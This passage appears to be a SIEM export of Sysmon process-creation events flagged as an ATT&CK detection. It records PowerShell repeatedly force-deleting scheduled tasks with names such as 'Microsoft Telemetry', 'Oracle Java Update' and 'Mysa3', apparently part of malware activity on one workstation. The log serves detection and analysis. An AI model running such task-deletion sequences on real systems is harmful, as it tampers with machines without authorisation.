+LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.186982400Z"",""eventRecordID"":""3294"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.184\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001004b12b00}\r\nProcessId: 6200\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.184"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-001004b12b00}"",""processId"":""6200"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Products Reporter\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.430",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.157 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001003af2b00} +ProcessId: 7488 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Spooler SubSystem Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.162076300Z"",""eventRecordID"":""3293"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.157\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001003af2b00}\r\nProcessId: 7488\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.157"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-001003af2b00}"",""processId"":""7488"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Spooler SubSystem Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.408",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.127 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001035ad2b00} +ProcessId: 1520 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Microsoft Telemetry"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.129795300Z"",""eventRecordID"":""3292"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.127\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001035ad2b00}\r\nProcessId: 1520\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.127"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-001035ad2b00}"",""processId"":""1520"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Microsoft Telemetry\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.387",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.092 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00105dab2b00} +ProcessId: 1064 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java Update"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} 
+ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.095563900Z"",""eventRecordID"":""3291"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.092\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00105dab2b00}\r\nProcessId: 1064\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo 
-NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.092"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-00105dab2b00}"",""processId"":""1064"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java Update\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.364",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.064 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00100ba92b00} +ProcessId: 800 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: 
{df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.066481600Z"",""eventRecordID"":""3290"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.064\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00100ba92b00}\r\nProcessId: 800\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.064"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-00100ba92b00}"",""processId"":""800"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.342",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.034 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001045a62b00} +ProcessId: 6224 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ok /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ok /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.037882400Z"",""eventRecordID"":""3289"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.034\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001045a62b00}\r\nProcessId: 6224\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN 
ok /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.034"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-001045a62b00}"",""processId"":""6224"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ok /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 
14:20:01.321",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.007 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010d9a32b00} +ProcessId: 4672 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 